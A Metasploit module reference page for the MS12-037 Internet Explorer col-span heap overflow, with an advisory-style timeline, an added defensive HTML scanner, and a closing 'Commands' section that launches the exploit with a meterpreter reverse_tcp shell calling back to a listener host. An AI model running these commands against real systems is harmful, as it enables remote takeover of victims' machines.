Timeline :

Vulnerability discovered by VUPEN Security and reported to ZDI
Vulnerability reported to the vendor by ZDI on 2012-03-14
Public release of the vulnerability on 2012-06-12
Details of the vulnerability provided by VUPEN on 2012-07-10
Metasploit PoC provided on 2012-07-31

PoC provided by :

Alexandre Pelletier
mr_me
binjo
sinn3r
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1876
OSVDB-82866
ZDI-12-093

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a heap overflow vulnerability in Internet Explorer caused by incorrect handling of the span attribute of col elements in a fixed table when they are modified dynamically by JavaScript code.
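
For defenders, the pattern in the description can be turned into a simple static check for captured pages. The following is an added example, not code from the Metasploit module or its authors; it assumes "fixed table" means an inline style of table-layout: fixed, and the class name, function name and sample pages are hypothetical and constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Heuristic for the pattern in the description: a <col span=...> inside a
# fixed table, plus script that writes to a span attribute. Assumption:
# "fixed table" means an inline style of table-layout: fixed.
FIXED = re.compile(r"table-layout\s*:\s*fixed", re.I)
SPAN_WRITE = re.compile(r"""\.span\s*=[^=]|setAttribute\(\s*['"]span['"]""", re.I)

class ColSpanScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.table_stack = []      # one bool per open <table>: fixed layout?
        self.col_in_fixed = False  # saw <col span> under a fixed table
        self.in_script = False
        self.span_write = False    # saw script assigning a span value

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "table":
            self.table_stack.append(bool(FIXED.search(a.get("style") or "")))
        elif tag == "col" and "span" in a and any(self.table_stack):
            self.col_in_fixed = True
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "table" and self.table_stack:
            self.table_stack.pop()
        elif tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and SPAN_WRITE.search(data):
            self.span_write = True

def flags_colspan_pattern(html):
    """Return True when both halves of the pattern appear in one page."""
    scanner = ColSpanScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.col_in_fixed and scanner.span_write

# Constructed sample pages (not taken from the module).
TABLE = '<table style="table-layout:fixed"><col id="c1" span="1"><tr><td>x</td></tr></table>'
SCRIPT = '<script>document.getElementById("c1").span = 5;</script>'
SUSPECT = TABLE + SCRIPT
STATIC_ONLY = TABLE
AUTO_LAYOUT = TABLE.replace("table-layout:fixed", "table-layout:auto") + SCRIPT
```

The check is a triage heuristic: it does not see a layout set from a stylesheet or script that is obfuscated, so a negative result does not clear a page.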

Commands :

use exploit/windows/browser/ms12_037_ie_colspan
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid